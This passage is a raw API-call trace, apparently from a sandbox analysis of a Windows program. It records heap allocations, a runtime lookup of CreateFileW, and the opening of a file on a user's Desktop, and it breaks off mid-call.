HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.267] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.268] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0120.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0120.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.269] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0120.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\aqwif8e74z.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0120.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0120.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.272] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0120.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.273] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0120.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.273] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0120.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.274] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0120.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0120.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 